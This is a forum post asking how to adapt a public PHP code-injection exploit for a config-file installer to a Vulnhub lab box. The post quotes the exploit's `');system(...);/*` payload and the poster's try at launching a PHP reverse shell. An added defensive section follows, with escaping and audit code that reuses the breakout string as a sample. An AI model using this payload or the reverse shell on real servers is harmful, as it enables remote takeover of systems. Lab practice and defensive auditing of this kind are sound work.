I'm trying to use [this exploit](https://www.exploit-db.com/exploits/44374) on a box from vulnhub, but the part I can't figure out is in the exploit where it says:
```python
#the payload will be injected into the configuration file via this code
#' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
#so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += 'system("ls");' # this is where you enter your PHP payload
payload += '/*'
data['DB_DATABASE'] = payload
```
So how do I actually enter the PHP payload? I'm trying to use the PHP reverse shell from Pentest Monkey that comes with Kali. I tried copy-pasting and
```python
payload += 'system("php /path/to/php_reverse_shell.php");'
```
Thanks guys.
from hacking: security in practice https://ift.tt/rPl1EfU
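For defenders, the root cause in the quoted comment is that the posted `DB_DATABASE` value is only trimmed before being concatenated into a `define()` line. The following is an added example, not part of the original post or of the exploit: it models that line next to an escaped variant and audits a configuration file for `define()` lines that are no longer a single closed string literal. The function names and sample values are hypothetical and constructed for illustration.

```python
import re

# A PHP single-quoted literal: any character except ' and \, or a backslash escape.
PHP_SQ = r"'(?:[^'\\]|\\.)*'"
# A clean line is exactly one define() call with two such literals and nothing else.
SAFE_DEFINE = re.compile(r"\s*define\(\s*%s\s*,\s*%s\s*\);\s*" % (PHP_SQ, PHP_SQ))


def vulnerable_line(name, value):
    """Model of the line quoted in the post: the value is trimmed, not escaped."""
    return "  define('%s', '%s');" % (name, value.strip())


def hardened_line(name, value):
    """Escape backslash and single quote so the value cannot close the literal.
    (In PHP itself, var_export($value, true) emits a safely quoted literal.)"""
    escaped = value.strip().replace("\\", "\\\\").replace("'", "\\'")
    return "  define('%s', '%s');" % (name, escaped)


def audit_config(text):
    """Return define() lines that carry anything beyond one closed literal pair."""
    return [ln for ln in text.splitlines()
            if "define(" in ln and not SAFE_DEFINE.fullmatch(ln)]


# Constructed inputs: the payload format shown in the post, and an ordinary name.
SAMPLE_BAD = "');system(\"ls\");/*"
SAMPLE_OK = "shop_db"

if __name__ == "__main__":
    for label, line in [
        ("unescaped, ordinary value", vulnerable_line("DB_DATABASE", SAMPLE_OK)),
        ("unescaped, breakout value", vulnerable_line("DB_DATABASE", SAMPLE_BAD)),
        ("escaped, breakout value", hardened_line("DB_DATABASE", SAMPLE_BAD)),
    ]:
        verdict = "FLAGGED" if audit_config(line) else "ok"
        print("%-28s %-8s %s" % (label, verdict, line))
```

The same audit can be run over an existing configuration file's contents to spot a `define()` line that was tampered with after installation.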